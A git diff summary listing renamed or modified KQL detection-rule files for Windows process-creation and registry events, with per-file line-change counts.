| 0 .../renamed_curl_exe_execution.kql | 0 .../renamed_ftp_exe_execution.kql | 0 .../renamed_gpg_exe_execution.kql | 0 .../renamed_jusched_exe_execution.kql | 0 .../renamed_mavinject_exe_execution.kql | 0 .../renamed_megasync_execution.kql | 0 .../renamed_microsoft_teams_execution.kql | 0 .../renamed_msdt_exe_execution.kql | 0 .../renamed_nircmd_exe_execution.kql | 0 .../renamed_office_binary_execution.kql | 0 .../renamed_pingcastle_binary_execution.kql | 0 .../renamed_plink_execution.kql | 0 .../renamed_procdump_execution.kql | 0 .../renamed_psexec_service_execution.kql | 0 ...d_remote_utilities_rat_rurat_execution.kql | 0 .../renamed_schtasks_execution.kql | 14 ++++++++++++ ...named_sysinternals_debugview_execution.kql | 0 ...renamed_sysinternals_sdelete_execution.kql | 0 ...ed_visual_studio_code_tunnel_execution.kql | 0 .../renamed_vmnat_exe_execution.kql | 0 .../renamed_whoami_execution.kql | 0 .../process_creation}/replace_exe_usage.kql | 0 ...sponse_file_execution_via_odbcconf_exe.kql | 0 ..._registry_value_tampering_proccreation.kql | 0 ...tificate_installed_from_susp_locations.kql | 0 .../ruby_inline_command_execution.kql | 0 ...sk_execution_as_configured_in_registry.kql | 0 .../run_powershell_script_from_ads.kql | 0 ...ll_script_from_redirected_input_stream.kql | 0 ..._execution_with_uncommon_dll_extension.kql | 0 ...ecution_without_commandline_parameters.kql | 0 .../rundll32_execution_without_parameters.kql | 0 .../rundll32_installscreensaver_execution.kql | 0 .../rundll32_registered_com_objects.kql | 0 .../rundll32_spawned_via_explorer_exe.kql | 0 .../rundll32_spawning_explorer.kql | 0 .../rundll32_unc_path_execution.kql | 0 .../runmru_registry_key_deletion.kql | 0 ...eboot_registry_key_deleted_via_reg_exe.kql | 0 ...ially_suspicious_path_via_schtasks_exe.kql | 0 ...ation_masquerading_as_system_processes.kql | 0 ...heduled_task_creation_via_schtasks_exe.kql | 0 ...th_curl_and_powershell_execution_combo.kql | 0 ...xecuting_encoded_payload_from_registry.kql | 0 ...d_task_executing_payload_from_registry.kql | 0 ...or_modification_with_system_privileges.kql | 0 .../schtasks_from_suspicious_folders.kql | 0 .../screen_capture_activity_via_psr_exe.kql | 0 ...script_event_consumer_spawning_process.kql | 0 ...reter_execution_from_suspicious_folder.kql | 0 ...g_commandline_process_spawned_regsvr32.kql | 0 .../sdclt_child_processes.kql | 0 ...nhost_calling_suspicious_child_process.kql | 0 ...sabled_via_minint_registry_key_process.kql | 0 ..._privileges_enumeration_via_whoami_exe.kql | 0 .../security_service_disabled_via_reg_exe.kql | 0 ...y_tools_keyword_lookup_via_findstr_exe.kql | 0 ...e_from_potentially_suspicious_location.kql | 0 ...e_access_via_volume_shadow_copy_backup.kql | 0 .../sensitive_file_dump_via_wbadmin_exe.kql | 0 ...e_recovery_from_backup_via_wbadmin_exe.kql | 0 ...dacl_abuse_to_hide_services_via_sc_exe.kql | 0 .../service_reconnaissance_via_wmic_exe.kql | 0 ...rvice_registry_key_deleted_via_reg_exe.kql | 0 ...curity_descriptor_tampering_via_sc_exe.kql | 0 .../service_started_stopped_via_wmic_exe.kql | 0 ...type_change_via_powershell_set_service.kql | 0 .../service_startuptype_change_via_sc_exe.kql | 0 ...files_as_system_files_using_attrib_exe.kql | 0 ...p16_exe_execution_with_custom_lst_file.kql | 0 ...tion_using_operating_systems_utilities.kql | 0 ...tion_using_operating_systems_utilities.kql | 0 ..._and_session_enumeration_using_net_exe.kql | 0 ..._dll_execution_in_suspicious_directory.kql | 0 .../shell_process_spawned_by_java_exe.kql | 0 .../process_creation}/shimcache_flush.kql | 0 ...ent_tools_powershell_session_detection.kql | 0 ...sqlite_chromium_profile_data_db_access.kql | 0 .../sqlite_firefox_profile_data_db_access.kql | 0 .../start_of_nt_virtual_dos_machine.kql | 0 .../start_windows_service_via_net_exe.kql | 0 .../sticky_key_like_backdoor_execution.kql | 0 .../stop_windows_service_via_net_exe.kql | 0 ...ws_service_via_powershell_stop_service.kql | 0 .../stop_windows_service_via_sc_exe.kql | 0 .../suspect_svchost_activity.kql | 0 ...ctory_database_snapshot_via_adexplorer.kql | 0 ...spicious_advpack_call_via_rundll32_exe.kql | 0 ...ous_agentexecutor_powershell_execution.kql | 0 ...ious_autorun_registry_modified_via_wmi.kql | 0 ...ectory_spawned_from_office_application.kql | 0 ..._access_agent_update_utility_execution.kql | 0 ...us_cabinet_file_execution_via_msdt_exe.kql | 0 .../suspicious_calculator_usage.kql | 0 ...suspicious_certreq_command_to_download.kql | 0 ...icious_child_process_created_as_system.kql | 0 ...icious_child_process_of_aspnetcompiler.kql | 0 ...suspicious_child_process_of_bginfo_exe.kql | 0 ...d_process_of_manage_engine_servicedesk.kql | 0 ...suspicious_child_process_of_sql_server.kql | 0 ...icious_child_process_of_veeam_dabatase.kql | 0 ...suspicious_child_process_of_wermgr_exe.kql | 0 ...nstance_executed_with_custom_extension.kql | 0 ...ous_clickfix_filefix_execution_pattern.kql | 13 +++++++++++ .../suspicious_codepage_switch_via_chcp.kql | 0 ...nd_patterns_in_scheduled_task_creation.kql | 0 .../suspicious_control_panel_dll_load.kql | 0 ...cious_copy_from_or_to_system_directory.kql | 2 +- .../suspicious_csi_exe_usage.kql | 0 .../suspicious_curl_exe_download.kql | 0 .../suspicious_customshellhost_execution.kql | 0 ...spicious_debugger_registration_cmdline.kql | 0 .../suspicious_desktopimgdownldr_command.kql | 0 ...diantz_alternate_data_stream_execution.kql | 0 ..._download_and_compress_into_a_cab_file.kql | 0 .../suspicious_dll_loaded_via_certoc_exe.kql | 0 ...icious_double_extension_file_execution.kql | 0 ..._download_from_direct_ip_via_bitsadmin.kql | 0 ...rom_file_sharing_website_via_bitsadmin.kql | 0 ...suspicious_download_from_office_domain.kql | 0 .../suspicious_download_via_certutil_exe.kql | 0 ...iver_dll_installation_via_odbcconf_exe.kql | 0 ...spicious_driver_install_by_pnputil_exe.kql | 0 .../suspicious_dumpminitool_execution.kql | 0 ...s_electron_application_child_processes.kql | 0 ...reflection_assembly_load_function_call.kql | 0 ...icious_encoded_powershell_command_line.kql | 0 ...aring_or_configuration_change_activity.kql | 0 ...xecution_from_outlook_temporary_folder.kql | 0 ...cious_execution_location_of_wermgr_exe.kql | 0 .../suspicious_execution_of_hostname.kql | 0 ...s_execution_of_installutil_without_log.kql | 0 ...us_execution_of_powershell_with_base64.kql | 0 .../suspicious_execution_of_shutdown.kql | 0 ...cious_execution_of_shutdown_to_log_out.kql | 0 .../suspicious_execution_of_systeminfo.kql | 0 ...th_whitespace_padding_clickfix_filefix.kql | 2 +- ...trac32_alternate_data_stream_execution.kql | 0 .../suspicious_extrac32_execution.kql | 0 ..._characteristics_due_to_missing_fields.kql | 0 ..._from_file_sharing_domain_via_curl_exe.kql | 0 ..._from_file_sharing_domain_via_wget_exe.kql | 0 ...ous_file_download_from_ip_via_curl_exe.kql | 0 ...ous_file_download_from_ip_via_wget_exe.kql | 0 ...le_download_from_ip_via_wget_exe_paths.kql | 0 ...loaded_from_direct_ip_via_certutil_exe.kql | 0 ..._file_sharing_website_via_certutil_exe.kql | 0 ...ile_encoded_to_base64_via_certutil_exe.kql | 0 ...tion_from_internet_hosted_webdav_share.kql | 0 .../suspicious_filefix_execution_pattern.kql | 15 +++++++++++++ ...usage_on_gzip_archive_process_creation.kql | 0 .../suspicious_git_clone.kql | 0 ...cious_greedy_compression_using_rar_exe.kql | 0 ..._reconnaissance_activity_using_net_exe.kql | 0 .../suspicious_grpconv_execution.kql | 0 .../suspicious_gup_usage.kql | 0 .../suspicious_hh_exe_execution.kql | 0 ...h_integritylevel_conhost_legacy_option.kql | 0 .../suspicious_hwp_sub_processes.kql | 0 .../suspicious_iis_module_registration.kql | 0 ...iis_url_globalrules_rewrite_via_appcmd.kql | 0 ...suspicious_invoke_webrequest_execution.kql | 0 ...oke_webrequest_execution_with_directip.kql | 0 ...ous_javascript_execution_via_mshta_exe.kql | 0 ...icious_kerberos_ticket_request_via_cli.kql | 15 +++++++++++++ .../suspicious_kernel_dump_using_dtrace.kql | 0 .../suspicious_key_manager_access.kql | 0 ...ine_padding_with_whitespace_characters.kql | 0 ...lation_of_default_accounts_via_net_exe.kql | 0 ...picious_microsoft_office_child_process.kql | 0 ...icious_microsoft_onenote_child_process.kql | 0 ...icious_modification_of_scheduled_tasks.kql | 0 ...d_execution_by_uncommon_parent_process.kql | 0 .../suspicious_msdt_parent_process.kql | 0 .../suspicious_mshta_child_process.kql | 0 ...uspicious_mshta_exe_execution_patterns.kql | 0 .../suspicious_msiexec_embedding_parent.kql | 0 ...spicious_msiexec_execute_arbitrary_dll.kql | 0 ...xec_quiet_install_from_remote_location.kql | 0 ...stsc_exe_execution_with_local_rdp_file.kql | 0 .../suspicious_network_command.kql | 0 .../suspicious_new_service_creation.kql | 0 ...ication_on_the_printer_spooler_service.kql | 0 .../suspicious_obfuscated_powershell_code.kql | 0 .../suspicious_outlook_child_process.kql | 0 ...parent_double_extension_file_execution.kql | 0 ...etoolboxcmd_exe_vm_state_change_script.kql | 0 ...uspicious_ping_del_command_combination.kql | 0 .../suspicious_plink_port_forwarding.kql | 0 ...xecution_to_change_lock_screen_timeout.kql | 0 ...owershell_download_and_execute_pattern.kql | 0 ...us_powershell_encoded_command_patterns.kql | 0 ...ious_powershell_iex_execution_patterns.kql | 0 ...l_invocations_specific_processcreation.kql | 0 ...ous_powershell_mailbox_export_to_share.kql | 0 ...picious_powershell_parameter_substring.kql | 0 .../suspicious_powershell_parent_process.kql | 0 ...spicious_process_by_web_server_process.kql | 0 ...uspicious_process_created_via_wmic_exe.kql | 0 ...execution_from_fake_recycle_bin_folder.kql | 0 ...us_process_masquerading_as_svchost_exe.kql | 0 .../suspicious_process_parents.kql | 0 ...icious_process_patterns_ntds_dit_exfil.kql | 0 .../suspicious_process_start_locations.kql | 0 ...spicious_processes_spawned_by_java_exe.kql | 0 .../suspicious_processes_spawned_by_winrm.kql | 0 ..._whitelisted_in_firewall_via_netsh_exe.kql | 0 .../suspicious_program_names.kql | 0 ...uspicious_provlaunch_exe_child_process.kql | 0 .../suspicious_query_of_machineguid.kql | 0 .../suspicious_rasdial_activity.kql | 0 .../suspicious_rdp_redirect_using_tscon.kql | 0 ...vity_using_get_localgroupmember_cmdlet.kql | 0 ...nce_activity_via_gathernetworkinfo_vbs.kql | 0 .../suspicious_recursive_takeown.kql | 0 ...cious_redirection_to_local_admin_share.kql | 0 .../suspicious_reg_add_bitlocker.kql | 0 .../suspicious_reg_add_open_command.kql | 0 ...y_modification_from_ads_via_regini_exe.kql | 0 ...s_regsvr32_execution_from_remote_share.kql | 0 ...ious_remote_child_process_from_outlook.kql | 0 ...sponse_file_execution_via_odbcconf_exe.kql | 0 ...suspicious_runas_like_flag_combination.kql | 0 ...us_rundll32_activity_invoking_sys_file.kql | 0 ...undll32_execution_with_image_extension.kql | 0 ...ious_rundll32_invoking_inline_vbscript.kql | 0 ...picious_rundll32_setupapi_dll_activity.kql | 0 .../suspicious_runscripthelper_exe.kql | 0 .../suspicious_scan_loop_network.kql | 0 ...ed_task_creation_involving_temp_folder.kql | 0 ...task_creation_via_masqueraded_xml_file.kql | 0 ...suspicious_scheduled_task_name_as_guid.kql | 0 ...ious_schtasks_execution_appdata_folder.kql | 0 ...sks_schedule_type_with_high_privileges.kql | 0 .../suspicious_schtasks_schedule_types.kql | 0 ...uspicious_screensave_change_by_reg_exe.kql | 0 ...ious_script_execution_from_temp_folder.kql | 0 .../suspicious_serv_u_process_pattern.kql | 0 .../suspicious_service_binary_directory.kql | 0 ...cl_modification_via_set_service_cmdlet.kql | 0 .../suspicious_service_path_modification.kql | 0 ...ious_shellexec_rundll_call_via_ordinal.kql | 0 ...s_shells_spawn_by_java_utility_keytool.kql | 0 ...us_speech_runtime_binary_child_process.kql | 0 .../suspicious_splwow64_without_params.kql | 0 ...suspicious_spool_service_child_process.kql | 0 .../suspicious_sysaidserver_child.kql | 0 ...uspicious_system_user_process_creation.kql | 0 ...ious_sysvol_domain_group_policy_access.kql | 0 .../suspicious_tscon_start_as_system.kql | 0 .../suspicious_ultravnc_execution.kql | 0 ...indows_defender_feature_via_powershell.kql | 0 ...irectory_diagnostic_tool_ntdsutil_exe_.kql | 0 ...with_recursive_directory_search_in_cmd.kql | 12 ++++++++++ .../suspicious_usage_of_shellexec_rundll.kql | 0 ...ious_use_of_csharp_interactive_console.kql | 0 .../suspicious_use_of_psloglist.kql | 0 .../suspicious_userinit_child_process.kql | 0 .../suspicious_vboxdrvinst_exe_parameters.kql | 0 .../suspicious_velociraptor_child_process.kql | 0 ...t_command_with_agentextensionpath_load.kql | 0 ...bdav_client_execution_via_rundll32_exe.kql | 0 .../suspicious_where_execution.kql | 0 ...der_folder_exclusion_added_via_reg_exe.kql | 0 ...der_registry_key_tampering_via_reg_exe.kql | 0 .../suspicious_windows_service_tampering.kql | 0 ...race_etw_session_tamper_via_logman_exe.kql | 0 ...ous_windows_update_agent_empty_cmdline.kql | 0 ...icious_windowsterminal_child_processes.kql | 0 ...ious_wmic_execution_via_office_process.kql | 0 .../suspicious_wmiprvse_child_process.kql | 0 ...cious_workstation_locking_via_rundll32.kql | 0 ...icious_x509enrollment_process_creation.kql | 0 ...picious_xor_encoded_powershell_command.kql | 0 .../suspicious_zipexec_execution.kql | 0 ...rver_execute_arbitrary_powershell_code.kql | 0 ..._vbs_execute_arbitrary_powershell_code.kql | 0 .../sysinternals_psservice_execution.kql | 0 .../sysinternals_pssuspend_execution.kql | 0 ...ternals_pssuspend_suspicious_execution.kql | 0 .../sysmon_configuration_update.kql | 0 ...ault_driver_altitude_using_findstr_exe.kql | 0 .../sysmon_driver_unloaded_via_fltmc_exe.kql | 0 .../sysprep_on_appdata_folder.kql | 0 ...and_volume_reconnaissance_via_wmic_exe.kql | 0 ...system_file_execution_location_anomaly.kql | 2 +- ...rmation_discovery_via_registry_queries.kql | 2 +- ...work_connections_discovery_via_net_exe.kql | 0 ...r_windows_defender_remove_mppreference.kql | 0 .../tap_installer_execution.kql | 0 .../taskkill_symantec_endpoint_protection.kql | 0 .../taskmgr_as_local_system.kql | 0 .../tasks_folder_evasion.kql | 0 .../terminal_service_process_spawn.kql | 0 .../time_travel_debugging_utility_usage.kql | 0 .../tor_client_browser_execution.kql | 2 +- .../trustedpath_uac_bypass_pattern.kql | 0 ...ss_abusing_winsat_path_parsing_process.kql | 0 ...ac_bypass_tools_using_computerdefaults.kql | 0 .../uac_bypass_using_changepk_and_slui.kql | 0 ...ass_using_consent_and_comctl32_process.kql | 0 .../uac_bypass_using_disk_cleanup.kql | 0 .../uac_bypass_using_dismhost.kql | 0 ..._bypass_using_event_viewer_recentviews.kql | 0 .../uac_bypass_using_idiagnostic_profile.kql | 0 .../uac_bypass_using_ieinstal_process.kql | 0 ...ng_msconfig_token_modification_process.kql | 0 ...ypass_using_ntfs_reparse_point_process.kql | 0 .../uac_bypass_using_pkgmgr_and_dism.kql | 0 ...ass_using_windows_media_player_process.kql | 0 .../uac_bypass_via_icmluautil.kql | 0 ...ss_via_windows_firewall_snap_in_hijack.kql | 0 .../process_creation}/uac_bypass_wsreset.kql | 0 ...persistence_via_wpbbin_processcreation.kql | 0 ...on_addinutil_exe_commandline_execution.kql | 0 ...pplications_execution_via_atbroker_exe.kql | 0 ...ncommon_child_process_of_addinutil_exe.kql | 0 .../uncommon_child_process_of_appvlp_exe.kql | 0 .../uncommon_child_process_of_bginfo_exe.kql | 0 ...ommon_child_process_of_defaultpack_exe.kql | 0 .../uncommon_child_process_of_setres_exe.kql | 0 ..._child_process_spawned_by_odbcconf_exe.kql | 0 ...uncommon_child_processes_of_sndvol_exe.kql | 0 ..._database_installation_via_sdbinst_exe.kql | 0 ..._filesystem_load_attempt_by_format_com.kql | 0 .../uncommon_link_exe_parent_process.kql | 0 ..._one_time_only_scheduled_task_at_00_00.kql | 0 .../uncommon_sigverif_exe_child_process.kql | 0 ...ncommon_svchost_command_line_parameter.kql | 13 +++++++++++ .../uncommon_svchost_parent_process.kql | 0 ...tem_information_discovery_via_wmic_exe.kql | 0 .../uncommon_userinit_child_process.kql | 0 .../uninstall_crowdstrike_falcon_sensor.kql | 0 .../uninstall_sysinternals_sysmon.kql | 0 .../unmount_share_via_net_exe.kql | 0 ...allation_attempt_using_add_appxpackage.kql | 0 .../unusual_child_process_of_dns_exe.kql | 0 .../unusual_parent_process_for_cmd_exe.kql | 0 ...ge_of_web_request_commands_and_cmdlets.kql | 0 .../use_icacls_to_hide_file_to_everyone.kql | 0 .../use_ntfs_short_name_in_command_line.kql | 0 .../use_ntfs_short_name_in_image.kql | 0 .../use_of_fsharp_interpreters.kql | 0 .../process_creation}/use_of_openconsole.kql | 0 .../use_of_pcalua_for_execution.kql | 0 .../process_creation}/use_of_remote_exe.kql | 0 .../use_of_scriptrunner_exe.kql | 0 ...use_of_the_sftp_exe_binary_as_a_lolbin.kql | 0 .../use_of_ttdinject_exe.kql | 0 ...use_of_ultravnc_remote_access_software.kql | 0 .../use_of_visualuiaverifynative_exe.kql | 0 .../use_of_vsiisexelauncher_exe.kql | 0 .../use_of_w32tm_as_timer.kql | 0 .../process_creation}/use_of_wfc_exe.kql | 0 .../use_short_name_path_in_image.kql | 0 .../user_added_to_highly_privileged_group.kql | 0 ...er_added_to_local_administrators_group.kql | 0 ...er_added_to_remote_desktop_users_group.kql | 0 ...overy_and_export_via_get_aduser_cmdlet.kql | 0 .../using_settingsynchost_exe_as_lolbin.kql | 0 .../utilityfunctions_ps1_proxy_dll.kql | 0 ...veeam_backup_database_suspicious_query.kql | 0 ...tabase_credentials_dump_via_sqlcmd_exe.kql | 0 .../verclsid_exe_runs_com_object.kql | 0 ...driver_installation_or_starting_of_vms.kql | 0 ...sual_basic_command_line_compiler_usage.kql | 0 .../visual_studio_code_tunnel_execution.kql | 0 ...tudio_code_tunnel_service_installation.kql | 0 ...ual_studio_code_tunnel_shell_execution.kql | 0 ...pressanykey_arbitrary_binary_execution.kql | 0 ...ejstools_pressanykey_renamed_execution.kql | 0 .../vmtoolsd_suspicious_child_process.kql | 0 ...shadowcopy_symlink_creation_via_mklink.kql | 0 ...ab_execution_from_non_default_location.kql | 0 ...bmig_unusual_parent_or_child_processes.kql | 0 .../weak_or_abused_passwords_in_cli.kql | 0 ...bdav_client_execution_via_rundll32_exe.kql | 0 ...l_detection_with_command_line_keywords.kql | 0 .../webshell_hacking_activity_patterns.kql | 0 .../webshell_tool_reconnaissance_activity.kql | 0 .../process_creation}/whoami_as_parameter.kql | 0 .../whoami_exe_execution_anomaly.kql | 0 ..._exe_execution_from_privileged_process.kql | 0 ...hoami_exe_execution_with_output_option.kql | 0 .../windows_admin_share_mount_via_net_exe.kql | 0 ...windows_backup_deleted_via_wbadmin_exe.kql | 0 ...credential_manager_access_via_vaultcmd.kql | 0 ...fault_domain_gpo_modification_via_gpme.kql | 13 +++++++++++ .../windows_defender_context_menu_removed.kql | 0 ...dows_defender_definition_files_removed.kql | 0 ...ndows_firewall_disabled_via_powershell.kql | 0 ...ix_updates_reconnaissance_via_wmic_exe.kql | 0 ..._hosted_webdav_share_mount_via_net_exe.kql | 0 .../windows_kernel_debugger_execution.kql | 0 ..._processes_suspicious_parent_directory.kql | 0 ...ows_recall_feature_enabled_via_reg_exe.kql | 0 ...very_environment_disabled_via_reagentc.kql | 0 .../windows_share_mount_via_net_exe.kql | 0 .../winrar_compressing_dump_files.kql | 0 ...inrar_execution_in_non_standard_folder.kql | 0 .../winrs_local_command_execution.kql | 0 ...exe_uncommon_argument_or_child_process.kql | 0 .../wmi_backdoor_exchange_transport_agent.kql | 0 .../wmi_persistence_script_event_consumer.kql | 0 .../wmic_remote_command_execution.kql | 0 .../wmiprvse_spawned_a_process.kql | 0 .../write_protect_for_storage_disabled.kql | 0 ...of_malicious_files_to_the_fonts_folder.kql | 0 .../wscript_shell_run_in_commandline.kql | 0 .../wsl_child_process_anomaly.kql | 0 .../wsl_kali_linux_usage.kql | 0 ...process_located_in_suspicious_location.kql | 0 ...mon_locations_via_presentationhost_exe.kql | 0 .../xsl_script_execution_via_wmic_exe.kql | 0 ...xe_execution_from_non_default_location.kql | 0 ...ence_via_disk_cleanup_handler_registry.kql | 0 ...scan_shellex_context_menu_registry_key.kql | 0 ...t_guard_protectedfolders_list_registry.kql | 0 ...removal_of_amsi_provider_registry_keys.kql | 0 ...x_value_to_hide_schedule_task_registry.kql | 2 +- ..._potential_com_hijacking_registry_keys.kql | 0 ...d_value_to_hide_schedule_task_registry.kql | 2 +- .../runmru_registry_key_deletion_registry.kql | 0 ...nt_connection_history_cleared_registry.kql | 0 ...ed_disableaidataanalysis_value_deleted.kql | 0 .../atbroker_registry_change.kql | 0 .../cmstp_execution_registry_event.kql | 0 ..._local_hidden_user_account_by_registry.kql | 2 +- .../registry_event}/dll_load_via_lsass.kql | 0 ...nymous_computer_allowanonymouscallback.kql | 0 ...entutl_volume_shadow_copy_service_keys.kql | 0 ...nmanager_service_installation_registry.kql | 0 .../narrator_s_feedback_hub_persistence.kql | 0 .../netntlm_downgrade_attack_registry.kql | 0 .../new_portproxy_registry_entry_added.kql | 0 ...office_application_startup_office_test.kql | 0 .../path_to_screensaver_binary_modified.kql | 0 ..._via_lsass_silentprocessexit_technique.kql | 0 .../potential_qakbot_registry_activity.kql | 0 ..._winnti_playbook_registry_manipulation.kql | 0 .../registry_entries_for_azorult_malware.kql | 0 ...ng_by_potentially_suspicious_processes.kql | 14 ++++++++++++ ...un_once_task_configuration_in_registry.kql | 0 ...rovider_ssp_added_to_lsa_configuration.kql | 0 .../shell_open_registry_keys_manipulation.kql | 0 ...ticky_key_like_backdoor_usage_registry.kql | 0 ...uspicious_camera_and_microphone_access.kql | 0 .../suspicious_run_key_from_download.kql | 0 .../uac_bypass_via_wsreset.kql | 0 ...digest_credguard_registry_modification.kql | 0 .../windows_credential_editor_registry.kql | 0 ...hreat_severity_default_action_modified.kql | 0 ...ows_registry_trust_record_modification.kql | 0 .../winekey_registry_modification.kql | 0 ..._windows_security_center_notifications.kql | 0 ...ugger_entry_to_aedebug_for_persistence.kql | 0 ...ger_entry_to_hangs_key_for_persistence.kql | 0 .../add_disallowrun_execution_to_registry.kql | 0 ...d_port_monitor_persistence_in_registry.kql | 0 .../allow_rdp_remote_assistance_feature.kql | 0 ...river_disallowed_on_dev_drive_registry.kql | 0 .../bypass_uac_using_delegateexecute.kql | 0 .../bypass_uac_using_event_viewer.kql | 0 .../bypass_uac_using_silentcleanup_task.kql | 0 .../registry_set}/change_the_fax_dll.kql | 0 ...ccount_associated_with_the_fax_service.kql | 0 ...channel_access_permission_via_registry.kql | 0 .../classes_autorun_keys_modification.kql | 0 .../clickonce_trust_prompt_tampering.kql | 0 .../registry_set}/com_hijack_via_sdclt.kql | 0 .../com_hijacking_via_treatas.kql | 0 ..._of_default_system_clsid_default_value.kql | 0 .../common_autorun_keys_modification.kql | 0 .../crashcontrol_crashdump_disabled.kql | 0 ...ntcontrolset_autorun_keys_modification.kql | 0 ...rrentversion_autorun_keys_modification.kql | 0 ...ntversion_nt_autorun_keys_modification.kql | 0 ..._file_open_handler_executes_powershell.kql | 0 ..._rdp_port_changed_to_non_standard_port.kql | 0 .../dhcp_callout_dll_installation.kql | 0 ...ore_mode_dsrm_registry_value_tampering.kql | 0 ...ministrative_share_creation_at_startup.kql | 0 ...network_protection_on_windows_defender.kql | 0 ..._internal_tools_or_feature_in_registry.kql | 0 .../disable_macro_runtime_scan_scope.kql | 0 ...crosoft_defender_firewall_via_registry.kql | 0 ...rivacy_settings_experience_in_registry.kql | 0 ...ble_pua_protection_on_windows_defender.kql | 0 ..._tamper_protection_on_windows_defender.kql | 0 ...nder_functionalities_via_registry_keys.kql | 0 ...ble_windows_event_logging_via_registry.kql | 0 .../disable_windows_firewall_by_registry.kql | 0 ..._windows_security_center_notifications.kql | 0 .../disabled_windows_defender_eventlog.kql | 0 ...splaying_hidden_files_feature_disabled.kql | 0 .../dns_over_https_enabled_by_registry.kql | 0 ..._to_disallowed_images_in_hvci_registry.kql | 0 .../registry_set}/enable_lm_hash_storage.kql | 0 ...ocal_manifest_installation_with_winget.kql | 0 ...enable_microsoft_dynamic_data_exchange.kql | 0 ...ing_cor_profiler_environment_variables.kql | 0 .../etw_logging_disabled_for_rpcrt4_dll.kql | 0 .../etw_logging_disabled_for_scm.kql | 0 ...abled_in_net_processes_sysmon_registry.kql | 0 .../execution_dll_of_choice_using_wab_exe.kql | 0 ...filefix_command_evidence_in_typedpaths.kql | 10 +++++++++ ...e_schedule_task_via_index_value_tamper.kql | 0 ...count_via_specialaccounts_registry_key.kql | 0 ...visor_enforced_code_integrity_disabled.kql | 2 +- ...r_enforced_paging_translation_disabled.kql | 0 .../registry_set}/ie_change_domain_zone.kql | 0 ..._to_mycomputer_zone_for_http_protocols.kql | 0 ...net_explorer_autorun_keys_modification.kql | 0 ...lorer_disablefirstruncustomize_enabled.kql | 0 ...vestandaloneupdater_exe_proxy_download.kql | 0 ...request_via_dumptype_registry_settings.kql | 0 ...d_in_a_potentially_suspicious_document.kql | 0 .../maxmpxct_registry_value_changed.kql | 0 ...crosoft_office_protected_view_disabled.kql | 0 .../modification_of_ie_registry_settings.kql | 0 ...odify_user_shell_folders_startup_value.kql | 0 ...enassemblyusagelog_registry_key_tamper.kql | 0 .../new_application_in_appcompat.kql | 0 ..._custom_db_path_registry_configuration.kql | 0 ...custom_vbscript_registry_configuration.kql | 0 ...ustom_wmi_query_registry_configuration.kql | 0 ...new_dns_serverlevelplugindll_installed.kql | 0 .../new_file_association_using_exefile.kql | 0 ..._registered_from_a_suspicious_location.kql | 0 .../new_odbc_driver_registered.kql | 0 ...or_ca_or_authroot_certificate_to_store.kql | 0 ..._run_key_pointing_to_suspicious_folder.kql | 0 ...ders_registered_with_uncommon_dll_name.kql | 0 .../office_autorun_keys_modification.kql | 0 .../office_macros_warning_disabled.kql | 0 ...tls1_0_tls1_1_protocol_version_enabled.kql | 0 ...ientmailrules_setting_enabled_registry.kql | 0 ...cution_without_warning_setting_enabled.kql | 0 ...ook_security_settings_updated_registry.kql | 0 ...ckup_for_system_registry_hives_enabled.kql | 0 ...tence_via_disk_cleanup_handler_autorun.kql | 0 .../persistence_via_hhctrl_ocx.kql | 0 .../persistence_via_new_sip_provider.kql | 0 .../potential_amsi_com_server_hijacking.kql | 0 ...t_manager_settings_associations_tamper.kql | 0 ...nt_manager_settings_attachments_tamper.kql | 0 ...otential_autologger_sessions_tampering.kql | 0 ...al_clickfix_execution_pattern_registry.kql | 2 +- ...tstrike_service_installations_registry.kql | 0 ..._hijacking_via_treatas_subkey_registry.kql | 2 +- ..._attempt_using_new_networkprovider_reg.kql | 0 ...ntial_eventlog_file_location_tampering.kql | 0 ..._pendingfilerenameoperations_tampering.kql | 0 .../potential_persistence_using_debugpath.kql | 0 ...istence_via_app_paths_default_property.kql | 0 ...via_appcompat_registerapprestart_layer.kql | 0 .../potential_persistence_via_autodialdll.kql | 0 ...tential_persistence_via_chm_helper_dll.kql | 0 ...ersistence_via_custom_protocol_handler.kql | 0 ...ential_persistence_via_dllpathoverride.kql | 0 ...ersistence_via_event_viewer_events_asp.kql | 0 ..._persistence_via_excel_add_in_registry.kql | 0 .../potential_persistence_via_globalflags.kql | 0 ...persistence_via_logon_scripts_registry.kql | 2 +- ...tential_persistence_via_lsa_extensions.kql | 0 .../potential_persistence_via_mpnotify.kql | 0 ...rsistence_via_mycomputer_registry_keys.kql | 0 ...sistence_via_netsh_helper_dll_registry.kql | 0 ...stence_via_new_amsi_providers_registry.kql | 14 ++++++++++++ ...tial_persistence_via_outlook_home_page.kql | 0 ...utlook_loadmacroprovideronboot_setting.kql | 0 ...ial_persistence_via_outlook_today_page.kql | 0 ...rsistence_via_scrobj_dll_com_hijacking.kql | 0 ...via_shim_database_in_uncommon_location.kql | 0 ...istence_via_shim_database_modification.kql | 0 .../potential_persistence_via_typedpaths.kql | 0 ...nce_via_visual_studio_tools_for_office.kql | 0 ..._powershell_execution_policy_tampering.kql | 0 ...y_abuse_for_binary_proxy_execution_reg.kql | 0 ...otential_psfactorybuffer_com_hijacking.kql | 0 ...are_activity_using_legalnotice_message.kql | 0 ...istence_attempt_via_dbgmanageddebugger.kql | 0 ...sistence_attempt_via_windows_telemetry.kql | 0 ...ll_context_menu_scan_command_tampering.kql | 0 ...ia_windows_developer_features_registry.kql | 0 ...t_reflectdebugger_registry_value_abuse.kql | 0 ...d_executed_via_run_dialog_box_registry.kql | 0 ...desktop_background_change_via_registry.kql | 0 ...ally_suspicious_odbc_driver_registered.kql | 0 .../powershell_as_a_service_in_registry.kql | 0 ...ng_disabled_via_registry_key_tampering.kql | 2 +- ...rshell_script_execution_policy_enabled.kql | 0 ...ua_sysinternal_tool_execution_registry.kql | 2 +- ..._sysinternals_tools_execution_registry.kql | 2 +- ...ity_warning_disabled_in_excel_registry.kql | 0 .../rdp_sensitive_settings_changed.kql | 22 +++++++++++++++++++ ...rdp_sensitive_settings_changed_to_zero.kql | 0 .../register_new_ifiltre_for_persistence.kql | 0 .../registry_disable_system_restore.kql | 0 .../registry_explorer_policy_modification.kql | 0 .../registry_hide_function_from_user.kql | 0 ..._modification_to_hidden_file_extension.kql | 0 ...istry_persistence_via_explorer_run_key.kql | 0 ...y_persistence_via_service_in_safe_mode.kql | 0 ...ctedadminmode_registry_value_tampering.kql | 0 ...sions_via_the_registry_2_vpn_extension.kql | 0 ...d_taskcache_change_by_uncommon_program.kql | 0 .../screensaver_registry_key_set.kql | 0 ...ostics_turn_off_check_enabled_registry.kql | 0 ...d_via_minint_registry_key_registry_set.kql | 0 .../service_binary_in_suspicious_folder.kql | 0 